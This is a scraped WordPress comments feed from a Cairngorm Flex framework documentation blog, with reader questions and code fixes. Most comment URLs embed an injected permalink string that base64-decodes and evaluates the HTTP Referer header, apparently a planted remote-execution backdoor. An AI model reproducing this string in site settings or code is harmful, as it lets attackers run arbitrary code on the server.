Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-settings.php on line 267

Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-settings.php on line 269

Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-settings.php on line 270

Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-settings.php on line 287

Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-includes/cache.php on line 36

Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-includes/query.php on line 21

Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-includes/theme.php on line 540

Warning: Cannot modify header information - headers already sent by (output started at /home/cairndoc/public_html/blog/wp-settings.php:267) in /home/cairndoc/public_html/blog/wp-includes/feed-rss2-comments.php on line 2
Comments for cairngormdocs.org http://cairngormdocs.org/blog Cairngormdocs.org Blog Sun, 05 Feb 2012 17:07:52 +0000 http://wordpress.org/?v=2.3.2 Comment on Darren Houle’s “Cafe Townsend Multi-View Contact Management” Example by Uno Dos http://cairngormdocs.org/blog/2006/11/23/cafe-townsend-multi-view-contact-management-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-47941 Uno Dos Mon, 25 Apr 2011 18:12:13 +0000 http://cairngormdocs.org/blog/2006/11/23/cafe-townsend-multi-view-contact-management-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-47941 The constructor in AppModelLocator.as appears to have a few typos. public function AppLocator() : void { should be: public function AppModelLocator() { The constructor in AppModelLocator.as appears to have a few typos.

public function AppLocator() : void {

should be:

public function AppModelLocator() {

]]>
Comment on CairngormDocs.org Feedback Form by Steve P http://cairngormdocs.org/blog/cairngormdocsorg-feedback-form/#comment-40783 Steve P Wed, 16 Dec 2009 14:59:07 +0000 http://cairngormdocs.org/blog/cairngormdocsorg-feedback-form/#comment-40783 The link to the pre-flight is broken. I am interested in looking at how/whether we should use Cairngorm. We are about to embark on a much bigger project than we've ever undertaken in Flex and I suspect we wil be making extensive use of ColdFusion (our background) and Flex data services. The link to the pre-flight is broken. I am interested in looking at how/whether we should use Cairngorm. We are about to embark on a much bigger project than we’ve ever undertaken in Flex and I suspect we wil be making extensive use of ColdFusion (our background) and Flex data services.

]]>
Comment on Nico Lierman’s “Hello World” Example by lakshmi http://cairngormdocs.org/blog/2007/01/19/nico-liermans-hello-world-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-40090 lakshmi Tue, 24 Nov 2009 08:02:33 +0000 http://cairngormdocs.org/blog/2007/01/19/nico-liermans-hello-world-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-40090 need helloworld example to understand cairgorn framework need helloworld example to understand cairgorn framework

]]>
Comment on CairngormStore 2.1 Example by Sandeep Manne http://cairngormdocs.org/blog/2006/11/23/cairngormstore-21-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-39808 Sandeep Manne Tue, 17 Nov 2009 06:59:46 +0000 http://cairngormdocs.org/blog/2006/11/23/cairngormstore-21-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-39808 I have a doubt in the application code, why we are writing business logic "addNewElementToCart", "deleteElement" etc.. in ModelLocator in flex Design Patterns ModelLocator is Responsible for business logic? I have a doubt in the application code, why we are writing business logic “addNewElementToCart”, “deleteElement” etc.. in ModelLocator in flex Design Patterns ModelLocator is Responsible for business logic?

]]>
Comment on Cairngorm Diagram Explorer Example by ShiVik http://cairngormdocs.org/blog/2006/11/23/cairngorm-diagram-explorer-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-39645 ShiVik Thu, 12 Nov 2009 11:22:30 +0000 http://cairngormdocs.org/blog/2006/11/23/cairngorm-diagram-explorer-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-39645 I haven't really started using flex builder for my development. Just using a simple editor right now. I know this is a pain, but just to get used to some mxml and AS I am doing so. I want to know if the cairngorm file can be added when compiling from command line as well? I haven’t really started using flex builder for my development. Just using a simple editor right now. I know this is a pain, but just to get used to some mxml and AS I am doing so.
I want to know if the cairngorm file can be added when compiling from command line as well?

]]>
Comment on Cairngorm Diagram Explorer Example by jobin http://cairngormdocs.org/blog/2006/11/23/cairngorm-diagram-explorer-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-34433 jobin Wed, 08 Jul 2009 10:22:38 +0000 http://cairngormdocs.org/blog/2006/11/23/cairngorm-diagram-explorer-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-34433 thanx Evan thanx Evan

]]>
Comment on CairngormStore 2.1 Example by ricelane http://cairngormdocs.org/blog/2006/11/23/cairngormstore-21-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-30295 ricelane Tue, 14 Apr 2009 06:23:21 +0000 http://cairngormdocs.org/blog/2006/11/23/cairngormstore-21-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-30295 You just need download cairngorm2.1 from adobe opensource and replace the cairngorm.swc and everything is ok now. You just need download cairngorm2.1 from adobe opensource and replace the cairngorm.swc and everything is ok now.

]]>
Comment on CairngormStore 2.1 Example by ???? http://cairngormdocs.org/blog/2006/11/23/cairngormstore-21-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-25355 ???? Thu, 18 Dec 2008 07:10:17 +0000 http://cairngormdocs.org/blog/2006/11/23/cairngormstore-21-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-25355 i see the same problem: “Products could not be retrieved” i see the same problem: “Products could not be retrieved”

]]>
Comment on Indiver Nagpal’s ColdFusion-based Contact Manager example by H Sekhon http://cairngormdocs.org/blog/2007/02/23/indiver-nagpals-coldfusion-based-contact-manager-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-21700 H Sekhon Tue, 02 Sep 2008 23:52:09 +0000 http://cairngormdocs.org/blog/2007/02/23/indiver-nagpals-coldfusion-based-contact-manager-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-21700 Confirming previous post. Broken URL Confirming previous post. Broken URL

]]>
Comment on Darren Houle’s “Cafe Townsend Multi-View Contact Management” Example by pkemp http://cairngormdocs.org/blog/2006/11/23/cafe-townsend-multi-view-contact-management-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-21568 pkemp Tue, 02 Sep 2008 00:38:58 +0000 http://cairngormdocs.org/blog/2006/11/23/cafe-townsend-multi-view-contact-management-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-21568 'When this code is built in FlexBuilder, the compiler returns an error of “-1? (which I have no idea how to interpret) in the Main.mxml file.' There's an easy way to fix this - locate the first line of Main.mxml: Cafe Townsend MVC Tutorial © 2006 Adobe and remove the copyright symbol ‘When this code is built in FlexBuilder, the compiler returns an error of “-1? (which I have no idea how to interpret) in the Main.mxml file.’

There’s an easy way to fix this - locate the first line of Main.mxml:
Cafe Townsend MVC Tutorial © 2006 Adobe

and remove the copyright symbol

]]>